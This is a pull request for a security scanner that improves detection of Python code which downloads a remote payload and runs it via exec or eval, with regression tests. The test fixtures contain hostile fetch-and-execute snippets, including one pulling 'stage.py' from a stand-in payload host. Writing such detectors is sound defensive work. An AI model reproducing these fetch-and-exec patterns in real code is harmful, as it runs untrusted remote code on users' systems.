### PR TITLE
Keep remote Python payloads visible through same-variable transformations

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -29,6 +29,9 @@ Format based on [Keep a Changelog](https://keepachangelog.com/).
 
 ### Fixed
 
+- Python remote-code checks retain the fetched source when a variable is decoded
+  or read back into itself, including inside a helper that returns the payload.
+  Replacing that variable with local content still clears the remote evidence.
 - Yarn classic dependency checks now resolve `npm:` aliases to the real package
   and the lockfile's resolved version. Conflicting package identities, malformed
   descriptors, non-registry sources and non-exact body versions remain excluded.

--- a/aguara_test.go
+++ b/aguara_test.go
@@ -448,6 +448,7 @@ exec(payload)
 			ruleID:   "PY_REMOTE_FETCH_EXEC_001",
 			content: `import requests
 payload = requests.get("https://payload.example/stage.py").text
+payload = payload.strip()
 exec(payload)
 `,
 		},

--- a/internal/engine/scriptrisk/remote_assignment_test.go
+++ b/internal/engine/scriptrisk/remote_assignment_test.go
@@ -1,0 +1,71 @@
+package scriptrisk
+
+import (
+	"strings"
+	"testing"
+)
+
+func TestPythonRemoteAssignmentState(t *testing.T) {
+	for _, tc := range []struct {
+		name, statements string
+		want             bool
+	}{
+		{"decode self", "code = requests.get(url).content\ncode = code.decode()", true},
+		{"read self", "code = requests.get(url)\ncode = code.read()", true},
+		{"text self", "code = requests.get(url)\ncode = code.text", true},
+		{"response identity self", "code = requests.get(url)\ncode = code\ncode = code.text", true},
+		{"read then decode", "code = requests.get(url)\ncode = code.read()\ncode = code.decode()", true},
+		{"two transforms", "code = requests.get(url).content\ncode = code.decode()\ncode = code.strip()", true},
+		{"hop bound", "code = requests.get(url).content\ncode = code.decode()\ncode = code.strip()\ncode = code.strip()", false},
+		{"local replacement", "code = requests.get(url).content\ncode = 'print(1)'", false},
+		{"replacement after decode", "code = requests.get(url).content\ncode = code.decode()\ncode = 'print(1)'", false},
+		{"response replacement", "code = requests.get(url)\ncode = SafeResponse()\ncode = code.text", false},
+		{"replacement mentions variable", "code = requests.get(url).content\ncode = 'code.decode()'", false},
+		{"response changes to payload", "code = requests.get(url)\ncode = code.content\ncode = 'safe'\ncode = code.text", false},
+		{"fresh fetch resets depth", "code = requests.get(url).content\ncode = code.decode()\ncode = code.strip()\ncode = requests.get(other).text", true},
+	} {
+		for _, helper := range []bool{false, true} {
+			mode := "inline"
+			src := "import requests\n" + tc.statements + "\nexec(code)"
+			if helper {
+				mode = "helper"
+				src = "import requests\ndef load():\n    " + strings.ReplaceAll(tc.statements, "\n", "\n    ") + "\n    return code\nexec(load())"
+			}
+			t.Run(tc.name+"/"+mode, func(t *testing.T) {
+				if got := hasRule(t, "bootstrap.py", src, RulePythonRemoteExec); got != tc.want {
+					t.Fatalf("remote fetch/exec = %v, want %v", got, tc.want)
+				}
+			})
+		}
+	}
+}
+
+func TestPythonRemoteSameLineAssignmentOrder(t *testing.T) {
+	for _, tc := range []struct {
+		src  string
+		want bool
+	}{
+		{"import requests\ncode = requests.get(url).text; exec(code)", true},
+		{"import requests\ncode = requests.get(url).text\ncode = 'print(1)'; exec(code)", false},
+		{"import requests\ncode = requests.get(url).content; code = code.decode(); exec(code)", true},
+		{"import requests\ndef load():\n    code = requests.get(url).content; code = code.decode(); return code\nexec(load())", true},
+		{"import requests\ndef load():\n    code = requests.get(url).content; code = 'safe'; return code\nexec(load())", false},
+		{"import requests\ncode = requests.get(url).content\ncode = 'safe; exec(code)'; exec(code)", false},
+	} {
+		if got := hasRule(t, "bootstrap.py", tc.src, RulePythonRemoteExec); got != tc.want {
+			t.Errorf("got %v, want %v for %s", got, tc.want, tc.src)
+		}
+	}
+}
+
+func TestPythonRemoteAssignmentSinkUsesPriorState(t *testing.T) {
+	for _, src := range []string{
+		"import requests\ncode = requests.get(url).text\ncode = code.strip()\ncode = code.strip()\ncode = eval(code)",
+		"import requests\ncode = requests.get(url)\ncode = eval(code.text)",
+		"import requests\nother = requests.get(url).text\ncode = other\nother = 'safe'\nexec(code)",
+	} {
+		if !hasRule(t, "bootstrap.py", src, RulePythonRemoteExec) {
+			t.Error("lost remote provenance before RHS execution")
+		}
+	}
+}

--- a/internal/engine/scriptrisk/scriptrisk.go
+++ b/internal/engine/scriptrisk/scriptrisk.go
@@ -222,6 +222,17 @@ type pythonFetchBindings struct {
 }
 
 func findRemoteFetchExec(stmts []statement) (int, string, bool) {
+	// The caller supplies masked code: semicolons in strings/comments are gone.
+	// Preserve execution order when several simple statements share a line.
+	var ordered []statement
+	for _, st := range stmts {
+		for _, text := range strings.Split(st.text, ";") {
+			if text = strings.TrimSpace(text); text != "" {
+				ordered = append(ordered, statement{line: st.line, indent: st.indent, text: text})
+			}
+		}
+	}
+	stmts = ordered
 	bindings := collectPythonFetchBindings(stmts)
 	if len(bindings.calls) == 0 {
 		return 0, "", false
@@ -258,36 +269,18 @@ func findRemoteFetchExec(stmts []statement) (int, string, bool) {
 		}
 
 		text := strings.TrimSpace(st.text)
-		if m := pyAssignRe.FindStringSubmatch(text); m != nil {
-			lhs, rhs := m[1], m[2]
-			delete(taint, lhs)
-			delete(responses, lhs)
-			switch {
-			case callsAny(rhs, bindings.calls) && hasPythonResponseBody(rhs):
-				taint[lhs] = 0
-			case callsAny(rhs, bindings.calls):
-				responses[lhs] = true
-			case callsAny(rhs, fetchHelpers):
-				taint[lhs] = 0
-			case referencesPythonResponseBody(rhs, responses):
-				taint[lhs] = 0
-			default:
-				if depth, ok := derivedDepth(rhs, taint); ok {
-					taint[lhs] = depth
-				}
+		// Calls on the RHS execute before an assignment replaces its destination.
+		if m := pyExecRe.FindStringSubmatch(text); m != nil {
+			arg := m[1]
+			if callsAny(arg, bindings.calls) && hasPythonResponseBody(arg) ||
+				callsAny(arg, fetchHelpers) ||
+				referencesPythonResponseBody(arg, responses) ||
+				referencesTaint(arg, taint) {
+				return st.line, text, true
 			}
 		}
-
-		m := pyExecRe.FindStringSubmatch(text)
-		if m == nil {
-			continue
-		}
-		arg := m[1]
-		if callsAny(arg, bindings.calls) && hasPythonResponseBody(arg) ||
-			callsAny(arg, fetchHelpers) ||
-			referencesPythonResponseBody(arg, responses) ||
-			referencesTaint(arg, taint) {
-			return st.line, text, true
+		if m := pyAssignRe.FindStringSubmatch(text); m != nil {
+			assignRemotePayload(m[1], m[2], bindings, fetchHelpers, taint, responses)
 		}
 	}
 	return 0, "", false
@@ -299,21 +292,7 @@ func functionReturnsRemotePayload(body []statement, bindings pythonFetchBindings
 	for _, st := range body {
 		text := strings.TrimSpace(st.text)
 		if m := pyAssignRe.FindStringSubmatch(text); m != nil {
-			lhs, rhs := m[1], m[2]
-			delete(taint, lhs)
-			delete(responses, lhs)
-			switch {
-			case callsAny(rhs, bindings.calls) && hasPythonResponseBody(rhs):
-				taint[lhs] = 0
-			case callsAny(rhs, bindings.calls):
-				responses[lhs] = true
-			case referencesPythonResponseBody(rhs, responses):
-				taint[lhs] = 0
-			default:
-				if depth, ok := derivedDepth(rhs, taint); ok {
-					taint[lhs] = depth
-				}
-			}
+			assignRemotePayload(m[1], m[2], bindings, nil, taint, responses)
 		}
 		if !strings.HasPrefix(text, "return ") {
 			continue
@@ -326,6 +305,30 @@ func functionReturnsRemotePayload(body []statement, bindings pythonFetchBindings
 		}
 	}
 	return false
+}
+
+func assignRemotePayload(lhs, rhs string, bindings pythonFetchBindings, helpers map[string]bool, taint map[string]int, responses map[string]bool) {
+	// Derive from the old state before clearing either kind of provenance.
+	depth, payload, response := 0, false, false
+	switch {
+	case callsAny(rhs, bindings.calls) && hasPythonResponseBody(rhs):
+		payload = true
+	case callsAny(rhs, bindings.calls):
+		response = true
+	case callsAny(rhs, helpers), referencesPythonResponseBody(rhs, responses):
+		payload = true
+	case strings.TrimSpace(rhs) == lhs && responses[lhs]:
+		response = true
+	default:
+		depth, payload = derivedDepth(rhs, taint)
+	}
+	delete(taint, lhs)
+	delete(responses, lhs)
+	if payload {
+		taint[lhs] = depth
+	} else if response {
+		responses[lhs] = true
+	}
 }
 
 func collectPythonFetchBindings(stmts []statement) pythonFetchBindings {


### PR DESCRIPTION
Python code can download a payload, decode it into the same variable, and then
execute it. Aguara was losing the remote source at the reassignment, so that
sequence could miss `PY_REMOTE_FETCH_EXEC_001` even though the equivalent code
using a second variable was detected.

The script analyzer now evaluates the right-hand side before replacing the
variable's tracked state. The correction applies both to direct execution and
to helpers that return downloaded content. Same-line statements are processed
in order, so a local replacement before `exec` clears the old remote evidence.

This preserves the existing two-hop propagation limit, imported-client checks,
scope separation and rule severity. It does not add recursive helper analysis
or general Python dataflow.

Regression tests reproduce the original misses and cover read/decode
self-assignment, response identity, genuine local replacements, same-line
ordering, helper returns and the hop limit. The public ScanContent test now
includes a same-variable transformation. Focused race tests, vet and lint pass;
no Python payload is executed during validation.
